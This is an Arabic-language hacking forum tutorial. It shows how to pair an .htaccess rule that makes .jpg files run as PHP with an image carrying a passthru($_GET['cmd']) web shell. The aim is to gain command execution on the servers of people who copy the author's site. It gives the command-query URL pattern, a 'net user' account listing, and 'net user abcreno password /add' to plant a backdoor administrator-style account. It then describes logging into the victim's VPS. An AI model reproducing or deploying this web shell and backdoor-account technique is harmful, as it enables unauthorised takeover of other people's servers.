طبعا زي ما مانتوا شايفين اسم الموضوع :
طبعا ايه الفكرة وازاي ؟
الفكرة هيا عبارة عن هاتكس وصورة :A5:
في ناس برده مش فاهم ازاي
طيب مش هطول عليكوا ونتابع الشرح + الادوات
الشرح كله بحقوق المحترفون العرب:A9:
الاول الادوات اهي
1 - الهاتكس
2 - الصورة
- الاول انا هجرب علي سيرفر شخصي علي جهازي -
انصح انك تحط الادوات في فولدر images
رابط الادوات : عزيزى العضو \ الزائر لايمكنك مشاهده الروابط الا بعد الرد
طبعا فكرة الهاتكس ان احنا حطينا في الكود :
كود PHP:
- الكود:
-
AddType application/x-httpd-php .jpg
نرجمة الكود ان الصورة تشغل اكواد php
طيب وليه صورة
الاجابة : عشان تتسحب ماهو هيحمل اي حاجة
دلوقتي نبدا الشغل وازاي تشتغل
بعد رفع الادوات نقوم باستعرض ملف images.jpg
هيظهرلنا كدا
واحد يسال ليه هيا مش صورة اقولك لا انا حقنت فيه كود php
الى هو
كود PHP:
- الكود:
-
<?php
passthru($_GET['cmd']);
?>
يعني Cmd الى هو منفذ الاومر D: شوفته الفكرة سهلة ازاي
دلوقتي هنكتب وراء images.jpg
هنكتب ?cmd=
مش فاهمين
مثلا :
كود:
- الكود:
-
http://ip/images/images.php?cmd= or http://site.com/images/images.php?cmd=
طبعا !
ip : اي بي سيرفرك
او
site : موقعك
الاول نتاكد هنستخدم امر استعراض اليوزرات الى علي الكمبيوتر تابعوا
الامر المستخدم
كود PHP:
- الكود:
-
net user
زي مافي الصورة ازاي الامر محطوط
وده طريقة كتابة الاكواد
كدا استخرجنا اليوزرات نتاكد من الويندوز نفسه عشان ماكونش غلطان
تمام اليوزرات زي مطلعنها
دلوقتي ايه العمل عايزين نمسح الصفحة بتاعتنا الى اتسحبت :A2:
دلوقتي هنضيف يوزر جديد + password
بالامر ده
كود PHP:
- الكود:
-
net user abcreno password /add
الاسم : abcreno
الباسورد : password
نجرب
معني كدا الامر نجح
نروح نتاكد :A24:
نجح طيب بعد ما نضيف نروح الان نخش علي في بي اس الى سحب الصفحة من عن طريق الاي بي
:A4:
وتقدر تمسح صفتحك ومعاك كمان في بي اس :A26:
طبعا انا تعبت في الموضوع وقاعد كتير عقبال لما اكود او افكر حاجة زي كدا
وتعبت في تنسيق الموضوع يارب محدش ينقل الموضوع بدون ذكر الحقوق
3bcreno - arab-dv
وشكراً كان معكم عبقرينو
انتظرو شرح كيف تعرف من يسحب الصفحة واي بي سيرفره
وشرح كيف تحمي جهازك والفي بي اس من الاخترق
